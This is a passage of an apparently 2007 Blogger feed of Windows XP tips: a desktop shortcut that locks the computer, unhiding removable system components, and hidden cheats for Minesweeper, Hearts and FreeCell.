Tips'/><title type='text'>Creating a desktop shortcut for locking your Computer</title><content type='html'>&lt;span style="font-family:times new roman;color:#ffffff;"&gt;&lt;strong&gt;&lt;em&gt;If you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks: Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%\System32\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.' You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button. In the 'look for icons in this file' box, type '%SystemRoot%\system32\SHELL32.dll' then click 'ok' to see a range of icons for your new shortcut. Choose an appropriate icon. Your desktop locking shortcut is now ready for use. Test it out. it is usegul if u have an account as it will prompt 4 a password.&lt;br /&gt;&lt;br /&gt;XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable. &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-332245704614797979?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/332245704614797979/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=332245704614797979&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/332245704614797979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/332245704614797979'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/creating-desktop-shortcut-for-locking.html' title='Creating a desktop shortcut for locking your Computer'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8156385018513944129</id><published>2007-09-27T12:54:00.000+10:00</published><updated>2007-10-01T23:30:56.159+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Games Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet Explorer Tips'/><title type='text'>Cheat codes&amp;cracks for default games in windows XP Minesweeper</title><content type='html'>&lt;span style="font-family:times new roman;color:#ffffff;"&gt;&lt;strong&gt;&lt;em&gt;Secret - Reveal MinesInstructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel. Secret - Stop TimerInstructions - Launch Minesweeper and start a game so the timer starts counting, then press the Windows Key + D to show the desktop. Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8156385018513944129?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8156385018513944129/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8156385018513944129&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8156385018513944129'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8156385018513944129'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/cheat-codes-for-default-games-in_4564.html' title='Cheat codes&amp;cracks for default games in windows XP Minesweeper'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8151387289151753516</id><published>2007-09-27T12:52:00.000+10:00</published><updated>2007-10-01T23:30:56.160+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Games Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet Explorer Tips'/><title type='text'>Cheat codes&amp;cracks for default games in windows XP Hearts</title><content type='html'>&lt;div align="left"&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#ffffff;"&gt;&lt;strong&gt;&lt;em&gt;Secret - Show All CardsInstructions - Edit this registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts and create a new String value named ZB with a Data value of 42. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards. Background - This secret is a reference to Douglas Adams' book the Hitch Hiker's Guide to the Galaxy. 'ZB' is the initials of the character Zaphod Beeblebrox, the Galactic President. '42' is the answer to The Ultimate Question Of Life, the Universe and Everything.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8151387289151753516?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8151387289151753516/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8151387289151753516&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8151387289151753516'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8151387289151753516'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/cheat-codes-for-default-games-in_26.html' title='Cheat codes&amp;cracks for default games in windows XP Hearts'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3392256878147603539</id><published>2007-09-27T12:49:00.000+10:00</published><updated>2007-10-01T23:30:56.160+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Games Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet Explorer Tips'/><title type='text'>Cheat codes&amp;cracks for default games in windows XP FreeCell</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#ffffff;"&gt;&lt;strong&gt;&lt;em&gt;Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win. Secret - Hidden Game ModesInstructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3392256878147603539?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3392256878147603539/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3392256878147603539&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3392256878147603539'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3392256878147603539'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/cheat-codes-for-default-games-in.html' title='Cheat codes&amp;cracks for default games in windows XP FreeCell'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry></feed>
